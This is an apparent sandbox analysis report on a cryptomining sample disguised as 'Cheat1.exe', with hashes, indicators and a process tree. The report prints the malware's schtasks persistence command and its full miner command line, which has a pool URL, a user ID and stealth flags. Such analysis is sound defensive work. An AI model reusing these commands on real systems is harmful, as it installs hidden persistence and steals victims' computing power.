xmrig | 291b8f4b2b3a3fcad7506bbf1e2231709dc557d8e3289e9d6f66cec8cce940d2

Analysis

max time kernel
147s
max time network
156s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
23-05-2024 00:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Cheat1.exe
Size

2.1MB
MD5

7ced67a2b06d542de8884bd8ef3388c8
SHA1

c2892cb614be03ec39988f9eb1ee5a60dfa74fe4
SHA256

19b5505a570061e49819101533505d29bc37d74588b4fec9334e836ea5199ea8
SHA512

0303874a789e678861d0b3501b07ac67ad5d0fc69c6607093e59775d142d17e9171a8b66ae88b6a45bed5b0f4373d6897a6b631e8f3f04bc9cb64daebe0e7b40
SSDEEP

49152:Uw3FhtA331AcHguh9JBiXIgl8HBsuvQDei7KbT5+i:D3Ff41/FhBiHesuvQL8X

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 17 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2796-39-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2796-56-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2796-41-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2796-37-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2796-54-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2796-51-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2796-60-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2796-63-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2796-62-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2796-61-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2796-59-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2796-35-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2796-49-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2796-47-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2796-45-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2796-43-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2796-64-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Executes dropped EXE 2 IoCs

Processes:

Discord.exesihost64.exe

pid process

2488 Discord.exe
2096 sihost64.exe
Loads dropped DLL 4 IoCs

Processes:

cmd.execonhost.exe

pid process

2708 cmd.exe
2708 cmd.exe
2976 conhost.exe
2976 conhost.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 2976 set thread context of 2796 2976 conhost.exe explorer.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2504 schtasks.exe

pid	process
2488	Discord.exe
2096	sihost64.exe

pid	process
2708	cmd.exe
2708	cmd.exe
2976	conhost.exe
2976	conhost.exe

description	pid	process	target process
PID 2976 set thread context of 2796	2976	conhost.exe	explorer.exe

pid	process
2504	schtasks.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

Processes:

conhost.execonhost.exeexplorer.exe

pid	process
2320	conhost.exe
2976	conhost.exe
2976	conhost.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe
2796	explorer.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

conhost.execonhost.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	2320	conhost.exe
Token: SeDebugPrivilege	2976	conhost.exe
Token: SeLockMemoryPrivilege	2796	explorer.exe
Token: SeLockMemoryPrivilege	2796	explorer.exe

Suspicious use of WriteProcessMemory 43 IoCs

Processes:

Cheat1.execonhost.execmd.execmd.exeDiscord.execonhost.exesihost64.exe

description	pid	process	target process
PID 2248 wrote to memory of 2320	2248	Cheat1.exe	conhost.exe
PID 2248 wrote to memory of 2320	2248	Cheat1.exe	conhost.exe
PID 2248 wrote to memory of 2320	2248	Cheat1.exe	conhost.exe
PID 2248 wrote to memory of 2320	2248	Cheat1.exe	conhost.exe
PID 2320 wrote to memory of 2632	2320	conhost.exe	cmd.exe
PID 2320 wrote to memory of 2632	2320	conhost.exe	cmd.exe
PID 2320 wrote to memory of 2632	2320	conhost.exe	cmd.exe
PID 2632 wrote to memory of 2504	2632	cmd.exe	schtasks.exe
PID 2632 wrote to memory of 2504	2632	cmd.exe	schtasks.exe
PID 2632 wrote to memory of 2504	2632	cmd.exe	schtasks.exe
PID 2320 wrote to memory of 2708	2320	conhost.exe	cmd.exe
PID 2320 wrote to memory of 2708	2320	conhost.exe	cmd.exe
PID 2320 wrote to memory of 2708	2320	conhost.exe	cmd.exe
PID 2708 wrote to memory of 2488	2708	cmd.exe	Discord.exe
PID 2708 wrote to memory of 2488	2708	cmd.exe	Discord.exe
PID 2708 wrote to memory of 2488	2708	cmd.exe	Discord.exe
PID 2488 wrote to memory of 2976	2488	Discord.exe	conhost.exe
PID 2488 wrote to memory of 2976	2488	Discord.exe	conhost.exe
PID 2488 wrote to memory of 2976	2488	Discord.exe	conhost.exe
PID 2488 wrote to memory of 2976	2488	Discord.exe	conhost.exe
PID 2976 wrote to memory of 2096	2976	conhost.exe	sihost64.exe
PID 2976 wrote to memory of 2096	2976	conhost.exe	sihost64.exe
PID 2976 wrote to memory of 2096	2976	conhost.exe	sihost64.exe
PID 2976 wrote to memory of 2796	2976	conhost.exe	explorer.exe
PID 2976 wrote to memory of 2796	2976	conhost.exe	explorer.exe
PID 2976 wrote to memory of 2796	2976	conhost.exe	explorer.exe
PID 2976 wrote to memory of 2796	2976	conhost.exe	explorer.exe
PID 2976 wrote to memory of 2796	2976	conhost.exe	explorer.exe
PID 2976 wrote to memory of 2796	2976	conhost.exe	explorer.exe
PID 2976 wrote to memory of 2796	2976	conhost.exe	explorer.exe
PID 2976 wrote to memory of 2796	2976	conhost.exe	explorer.exe
PID 2976 wrote to memory of 2796	2976	conhost.exe	explorer.exe
PID 2976 wrote to memory of 2796	2976	conhost.exe	explorer.exe
PID 2976 wrote to memory of 2796	2976	conhost.exe	explorer.exe
PID 2976 wrote to memory of 2796	2976	conhost.exe	explorer.exe
PID 2976 wrote to memory of 2796	2976	conhost.exe	explorer.exe
PID 2976 wrote to memory of 2796	2976	conhost.exe	explorer.exe
PID 2976 wrote to memory of 2796	2976	conhost.exe	explorer.exe
PID 2976 wrote to memory of 2796	2976	conhost.exe	explorer.exe
PID 2096 wrote to memory of 1896	2096	sihost64.exe	conhost.exe
PID 2096 wrote to memory of 1896	2096	sihost64.exe	conhost.exe
PID 2096 wrote to memory of 1896	2096	sihost64.exe	conhost.exe
PID 2096 wrote to memory of 1896	2096	sihost64.exe	conhost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Cheat1.exe
"C:\Users\Admin\AppData\Local\Temp\Cheat1.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2248

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Cheat1.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2320

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr "C:\Users\Admin\AppData\Local\Temp\Discord.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:2632

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr "C:\Users\Admin\AppData\Local\Temp\Discord.exe"
4⤵
- Creates scheduled task(s)
PID:2504

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\Discord.exe"
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2708

C:\Users\Admin\AppData\Local\Temp\Discord.exe
C:\Users\Admin\AppData\Local\Temp\Discord.exe
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2488

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Discord.exe"
5⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2976

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2096

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
7⤵
PID:1896

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=7201279 --pass=Cheat --cpu-max-threads-hint=50 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=80 --cinit-stealth
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Discord.exe

Filesize
2.1MB

MD5
7ced67a2b06d542de8884bd8ef3388c8

SHA1
c2892cb614be03ec39988f9eb1ee5a60dfa74fe4

SHA256
19b5505a570061e49819101533505d29bc37d74588b4fec9334e836ea5199ea8

SHA512
0303874a789e678861d0b3501b07ac67ad5d0fc69c6607093e59775d142d17e9171a8b66ae88b6a45bed5b0f4373d6897a6b631e8f3f04bc9cb64daebe0e7b40

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
31KB

MD5
99f6ddfde83c4a40084b29ec309336c7

SHA1
7246f470c153a8c107fb4ff153da01f76c14db8e

SHA256
37773977416a09ae07d05dda3ecf488bba262436cd59a161f8189aeac5a35c81

SHA512
c488d00bf7678d4c28b392ddf8749cdef8875b0e451c4e7d1dcf214acbd15bfc2d71d6514c3e122a2dd7fc91aee9d4257d4551eeb12983a2858c14c8ddf23b95

Download Submit
memory/1896-66-0x0000000001B90000-0x0000000001B96000-memory.dmp

Filesize
24KB

Download
memory/1896-65-0x0000000000060000-0x0000000000066000-memory.dmp

Filesize
24KB

Download
memory/2320-1-0x000007FEF5393000-0x000007FEF5394000-memory.dmp

Filesize
4KB

Download
memory/2320-2-0x000000001B580000-0x000000001B7A0000-memory.dmp

Filesize
2.1MB

Download
memory/2320-3-0x000007FEF5390000-0x000007FEF5D7C000-memory.dmp

Filesize
9.9MB

Download
memory/2320-4-0x000007FEF5390000-0x000007FEF5D7C000-memory.dmp

Filesize
9.9MB

Download
memory/2320-5-0x000007FEF5390000-0x000007FEF5D7C000-memory.dmp

Filesize
9.9MB

Download
memory/2320-6-0x000007FEF5390000-0x000007FEF5D7C000-memory.dmp

Filesize
9.9MB

Download
memory/2320-13-0x000007FEF5390000-0x000007FEF5D7C000-memory.dmp

Filesize
9.9MB

Download
memory/2320-0-0x0000000000170000-0x0000000000390000-memory.dmp

Filesize
2.1MB

Download
memory/2796-59-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2796-51-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2796-64-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2796-29-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2796-31-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2796-39-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2796-57-0x0000000000160000-0x0000000000180000-memory.dmp

Filesize
128KB

Download
memory/2796-56-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2796-41-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2796-43-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2796-37-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2796-54-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2796-53-0x000007FFFFFDD000-0x000007FFFFFDE000-memory.dmp

Filesize
4KB

Download
memory/2796-33-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2796-60-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2796-63-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2796-62-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2796-61-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2796-45-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2796-35-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2796-49-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2796-47-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2976-17-0x000007FEF49A0000-0x000007FEF538C000-memory.dmp

Filesize
9.9MB

Download
memory/2976-27-0x000007FEF49A0000-0x000007FEF538C000-memory.dmp

Filesize
9.9MB

Download
memory/2976-58-0x000007FEF49A0000-0x000007FEF538C000-memory.dmp

Filesize
9.9MB

Download
memory/2976-28-0x000007FEF49A0000-0x000007FEF538C000-memory.dmp

Filesize
9.9MB

Download
memory/2976-16-0x000007FEF49A0000-0x000007FEF538C000-memory.dmp

Filesize
9.9MB

Download
memory/2976-15-0x000007FEF49A3000-0x000007FEF49A4000-memory.dmp

Filesize
4KB

Download